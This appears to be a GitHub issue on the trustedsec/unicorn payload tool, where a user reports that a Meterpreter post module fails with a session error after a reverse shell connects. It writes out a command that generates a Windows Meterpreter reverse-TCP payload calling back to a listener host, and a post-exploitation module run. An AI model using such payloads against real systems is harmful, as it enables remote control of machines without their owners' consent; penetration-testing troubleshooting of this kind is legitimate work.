trustedsec/unicorn

meterpreter cannot use established connection

Kofl opened this issue · 0 comments

Kofl commented

Hi,

we generated the code for the reverse shell and its connecting fine.
(unicorn.py windows/meterpreter/reverse_tcp 10.0.0.1 4444)

But on running a command with msf5, I get:

meterpreter > run post/windows/gather/checkvm

[-] Post failed: RuntimeError Could not get a hold of the session.
[-] Call stack:
[-] /usr/share/metasploit-framework/lib/msf/core/post_mixin.rb:65:in check_for_session_readiness' [-] /usr/share/metasploit-framework/lib/msf/core/post_mixin.rb:47:in setup'
[-] /usr/share/metasploit-framework/lib/msf/core/post.rb:42:in `setup'

Defender is disabled, native msf5 reverse shell is working fine.

Framework Version: 5.0.60-dev
Kali GNU/Linux Rolling

Best